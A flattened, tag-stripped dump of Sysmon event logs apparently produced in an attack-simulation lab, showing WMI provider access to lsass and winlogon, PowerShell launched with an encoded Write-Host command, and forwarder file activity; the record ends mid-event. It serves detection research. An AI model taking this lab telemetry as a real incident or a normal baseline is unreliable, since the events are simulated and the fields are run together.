16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237284Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.637{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237283Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237282Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237281Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237280Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237279Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237278Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_tnfsw4ta.c4g.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237277Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D64-603E-78AA-00000000AD01}10508ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237276Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_toq4xogk.nov.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237275Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-29F0-6039-C005-00000000AD01}49442420C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7FAA-00000000AD01}10308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237274Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.622{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237273Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237272Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237271Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237270Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237269Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-229D-6039-0500-00000000AD01}636652C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237268Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002237267Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.617{05ADC7E1-6D64-603E-7EAA-00000000AD01}4120C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -EncodedCo VwByAGkAdABlAC0ASABvAHMAdAAgADgANQA1ADQAMQAxADAAMAAtAGQAZABmADYALQA0AGQANgA2AC0AOABlAGMAYgAtAGUANwBlADQAMgBkADkAMABkAGUAZAA4AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 11241100x80000000000000002237266Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.606{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_toq4xogk.nov.ps12021-03-02 16:52:52.606 10341000x80000000000000002237265Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.590{05ADC7E1-229F-6039-1600-00000000AD01}15401672C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237264Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.590{05ADC7E1-229F-6039-1600-00000000AD01}15401572C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7AAA-00000000AD01}7324C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237263Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002237262Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EB51C68A0F05D5DCDE65F3521293EE2,SHA256=1E26E3E33F4E9A6AF355F85AF1B26C13C00F980E59EF49E3334A39970BE2B745,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237261Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7DAA-00000000AD01}14492C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237260Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7CAA-00000000AD01}11544C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002237259Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0637667122069395738AD95D6831664F,SHA256=72CFF376177A4ED4474774CF7E41F0AEC4D6331DA84A9C8E2C716ACAC81D4F73,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237258Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.574{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-7BAA-00000000AD01}11996C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237257Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 